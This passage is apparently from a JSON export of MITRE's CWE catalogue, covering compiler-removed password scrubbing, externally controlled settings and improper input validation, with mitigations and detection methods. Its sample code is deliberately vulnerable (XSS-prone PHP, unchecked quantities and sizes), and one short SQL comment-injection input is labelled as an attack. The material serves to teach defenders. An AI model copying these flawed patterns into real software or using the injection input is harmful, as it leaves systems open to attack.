Box","Description":"This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Store the sensitive data in a \\"volatile\\" memory location if available."},{"Phase":"Build and Compilation","Description":"If possible, configure your compiler so that it does not remove dead stores."},{"Phase":"Architecture and Design","Description":"Where possible, encrypt sensitive data that are used by a software system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code reads a password from the user, uses the password to connect to a back-end mainframe and then attempts to scrub the password from memory using memset().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void GetData(char *MFAddr) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char pwd[64];if (GetPasswordFromUser(pwd, sizeof(pwd))) {}memset(pwd, 0, sizeof(pwd));","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (ConnectToMainframe(MFAddr, pwd)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Interaction with mainframe"}}}}}}}},"Body_Text":["The code in the example will behave correctly if it is executed verbatim, but if the code is compiled using an optimizing compiler, such as Microsoft Visual C++ .NET or GCC 3.x, then the call to memset() will be removed as a dead store because the buffer pwd is not used after its value is overwritten [18]. Because the buffer pwd contains a sensitive value, the application may be vulnerable to attack if the data are left memory resident. If attackers are able to access the correct region of memory, they may use the recovered password to gain control of the system.","It is common practice to overwrite sensitive data manipulated in memory, such as passwords or cryptographic keys, in order to prevent attackers from learning system secrets. However, with the advent of optimizing compilers, programs do not always behave as their source code alone would suggest. In the example, the compiler interprets the call to memset() as dead code because the memory being written to is not subsequently used, despite the fact that there is clearly a security motivation for the operation to occur. The problem here is that many compilers, and in fact many programming languages, do not take this and other security concerns into consideration in their efforts to improve efficiency.","Attackers typically exploit this type of vulnerability by using a core dump or runtime mechanism to access the memory used by a particular application and recover the secret information. Once an attacker has access to the secret information, it is relatively straightforward to further exploit the system and possibly compromise other resources with which the application interacts."]}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Compiler Optimization"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive memory uncleared by compiler optimization"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC06-C","Entry_Name":"Be aware of compiler optimization when dealing with sensitive data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, "A Compiler Optimization Caveat" Page 322"}},{"attr":{"@_External_Reference_ID":"REF-124"}},{"attr":{"@_External_Reference_ID":"REF-125"}},{"attr":{"@_External_Reference_ID":"REF-126"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Insecure Compiler Optimization","attr":{"@_Date":"2008-04-11"}}}},"15":{"attr":{"@_ID":"15","@_Name":"External Control of System or Configuration Setting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"One or more system settings or configuration elements can be externally controlled by a user.","Extended_Description":"Allowing external control of system settings can disrupt service or cause an application to behave in unexpected, and potentially malicious ways.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Setting manipulation vulnerabilities occur when an attacker can control values that govern the behavior of the system, manage specific resources, or in some way affect the functionality of the application."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"Phase":["Implementation","Architecture and Design"],"Description":"Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control."},{"Phase":["Implementation","Architecture and Design"],"Description":"In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following C code accepts a number as one of its command line parameters and sets it as the host ID of the current machine.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...sethostid(argv[1]);...","xhtml:br":["",""]}},"Body_Text":"Although a process must be privileged to successfully invoke sethostid(), unprivileged users may be able to invoke the program. The code in this example allows user input to directly control the value of a system setting. If an attacker provides a malicious value for host ID, the attacker can misidentify the affected machine on the network or cause other unintended behavior."},{"Intro_Text":"The following Java code snippet reads a string from an HttpServletRequest and sets it as the active catalog for a database Connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...conn.setCatalog(request.getParameter(\\"catalog\\"));...","xhtml:br":["",""]}},"Body_Text":"In this example, an attacker could cause an error by providing a nonexistent catalog name or connect to an unauthorized portion of the database."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Setting Manipulation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"146"}},{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"203"}},{"attr":{"@_CAPEC_ID":"270"}},{"attr":{"@_CAPEC_ID":"271"}},{"attr":{"@_CAPEC_ID":"69"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Setting Manipulation","attr":{"@_Date":"2008-04-11"}}}},"20":{"attr":{"@_ID":"20","@_Name":"Improper Input Validation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product receives input or data, but it does\\n not validate or incorrectly validates that the input has the\\n properties that are required to process the data safely and\\n correctly.","Extended_Description":{"xhtml:p":["Input validation is a frequently-used technique\\n\\t for checking potentially dangerous inputs in order to\\n\\t ensure that the inputs are safe for processing within the\\n\\t code, or when communicating with other components. When\\n\\t software does not validate input properly, an attacker is\\n\\t able to craft the input in a form that is not expected by\\n\\t the rest of the application. This will lead to parts of the\\n\\t system receiving unintended input, which may result in\\n\\t altered control flow, arbitrary control of a resource, or\\n\\t arbitrary code execution.","Input validation is not the only technique for\\n\\t processing input, however. Other techniques attempt to\\n\\t transform potentially-dangerous input into something safe, such\\n\\t as filtering (CWE-790) - which attempts to remove dangerous\\n\\t inputs - or encoding/escaping (CWE-116), which attempts to\\n\\t ensure that the input is not misinterpreted when it is included\\n\\t in output to another component. Other techniques exist as well\\n\\t (see CWE-138 for more examples.)","Input validation can be applied to:","Data can be simple or structured. Structured data\\n\\t can be composed of many nested layers, composed of\\n\\t combinations of metadata and raw data, with other simple or\\n\\t structured data.","Many properties of raw data or metadata may need\\n\\t to be validated upon entry into the code, such\\n\\t as:","Implied or derived properties of data must often\\n\\t be calculated or inferred by the code itself. Errors in\\n\\t deriving properties may be considered a contributing factor\\n\\t to improper input validation.","Note that \\"input validation\\" has very different\\n\\t meanings to different people, or within different\\n\\t classification schemes. Caution must be used when\\n\\t referencing this CWE entry or mapping to it. For example,\\n\\t some weaknesses might involve inadvertently giving control\\n\\t to an attacker over an input when they should not be able\\n\\t to provide an input at all, but sometimes this is referred\\n\\t to as input validation.","Finally, it is important to emphasize that the\\n\\t distinctions between input validation and output escaping\\n\\t are often blurred, and developers must be careful to\\n\\t understand the difference, including how input validation\\n\\t is not always sufficient to prevent vulnerabilities,\\n\\t especially when less stringent data types must be\\n\\t supported, such as free-form text. Consider a SQL injection\\n\\t scenario in which a person\'s last name is inserted into a\\n\\t query. The name \\"O\'Reilly\\" would likely pass the validation\\n\\t step since it is a common last name in the English\\n\\t language. However, this valid name cannot be directly\\n\\t inserted into the database because it contains the \\"\'\\"\\n\\t apostrophe character, which would need to be escaped or\\n\\t otherwise transformed. In this case, removing the\\n\\t apostrophe might reduce the risk of SQL injection, but it\\n\\t would produce incorrect behavior because the wrong name\\n\\t would be recorded."],"xhtml:ul":[{"xhtml:li":["raw data - strings, numbers, parameters, file contents, etc.","metadata - information about the raw data, such as headers or size"]},{"xhtml:li":["specified quantities such as size, length, frequency, price, rate, number of operations, time, etc.","implied or derived quantities, such as the actual size of a file instead of a specified size","indexes, offsets, or positions into more complex data structures","symbolic keys or other elements into hash tables, associative arrays, etc.","well-formedness, i.e. syntactic correctness - compliance with expected syntax","lexical token correctness - compliance with rules for what is treated as a token","specified or derived type - the actual type of the input (or what the input appears to be)","consistency - between individual data elements, between raw data and metadata, between references, etc.","conformance to domain-specific rules, e.g. business logic","equivalence - ensuring that equivalent inputs are treated the same","authenticity, ownership, or other attestations about the input, e.g. a cryptographic signature to prove the source of the data"]}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"74","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"770","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","If a programmer believes that an attacker cannot modify certain inputs, then the programmer might not perform any input validation at all. For example, in web applications, many programmers believe that cookies and hidden form fields can not be modified from a web browser (CWE-472), although they can be altered using a proxy or a custom program. In a client-server architecture, the programmer might assume that client-side security checks cannot be bypassed, even when a custom client could be written that skips those checks (CWE-602)."]}}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"An attacker could provide unexpected values and cause a program crash or excessive consumption of resources, such as memory and CPU."},{"Scope":"Confidentiality","Impact":["Read Memory","Read Files or Directories"],"Note":"An attacker could read confidential data if they are able to control resource references."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"An attacker could use malicious input to modify data or possibly alter control flow in unexpected ways, including arbitrary command execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-3"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Some instances of improper input validation can be detected using automated static analysis.","A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present.","Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}},{"attr":{"@_Detection_Method_ID":"DM-4"},"Method":"Manual Static Analysis","Description":"When custom input validation is required, such as when enforcing business rules, manual analysis is necessary to ensure that the validation is properly implemented."},{"attr":{"@_Detection_Method_ID":"DM-5"},"Method":"Fuzzing","Description":"Fuzzing techniques can be useful for detecting input validation errors. When unexpected inputs are provided to the software, the software should not crash or otherwise become unstable, and it should generate application-controlled error messages. If exceptions or interpreter-generated error messages occur, this indicates that the input was not detected and handled within the application logic itself."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build \\"recognizers\\" for that language. This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111]"},{"attr":{"@_Mitigation_ID":"MIT-7"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173)."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"Phase":"Implementation","Description":"When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined."},{"attr":{"@_Mitigation_ID":"MIT-35"},"Phase":"Implementation","Description":"Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow."},{"Phase":"Implementation","Description":"Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input\'s values fall within the expected range of allowable values and that multi-field consistencies are maintained."},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-135"},"Intro_Text":"This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public static final double price = 20.00;int quantity = currentUser.getAttribute(\\"quantity\\");double total = price * quantity;chargeUser(total);...","xhtml:br":["","","","",""]}},"Body_Text":"The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited."},{"attr":{"@_Demonstrative_Example_ID":"DX-136"},"Intro_Text":"This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...#define MAX_DIM 100...int m,n, error;board_square_t *board;printf(\\"Please specify the board height: \\\\n\\");error = scanf(\\"%d\\", &m);if ( EOF == error ){}printf(\\"Please specify the board width: \\\\n\\");error = scanf(\\"%d\\", &n);if ( EOF == error ){}if ( m > MAX_DIM || n > MAX_DIM ) {}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/* board dimensions */","xhtml:div":[{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"Value too large: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program."},{"Intro_Text":"The following example shows a PHP application in which the programmer attempts to display a user\'s birthday and homepage.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$birthday = $_GET[\'birthday\'];$homepage = $_GET[\'homepage\'];echo \\"Birthday: $birthday<br>Homepage: <a href=$homepage>click here</a>\\"","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"2009-01-09--"}],"Body_Text":["The programmer intended for $birthday to be in a date format and $homepage to be a valid URL. However, since the values are derived from an HTTP request, if an attacker can trick a victim into clicking a crafted URL with <script> tags providing the values for birthday and / or homepage, then the script will run on the client\'s browser when the web server echoes the content. Notice that even if the programmer were to defend the $birthday variable by restricting input to integers and dashes, it would still be possible for an attacker to provide a string of the form:","If this data were used in a SQL statement, it would treat the remainder of the statement as a comment. The comment could disable other security-related logic in the statement. In this case, encoding combined with input validation would be a more useful protection mechanism.","Furthermore, an XSS (CWE-79) attack or SQL injection (CWE-89) are just a few of the potential consequences when input validation is not used. Depending on the context of the code, CRLF Injection (CWE-93), Argument Injection (CWE-88), or Command Injection (CWE-77) may also be possible."]},{"attr":{"@_Demonstrative_Example_ID":"DX-34"},"Intro_Text":"The following example takes a user-supplied value to allocate an array of objects and then operates on the array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void buildList ( int untrustedListSize ){}","xhtml:div":{"#text":"if ( 0 > untrustedListSize ){}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"die(\\"Negative value supplied for list size, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}},"Body_Text":"This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown."},{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void 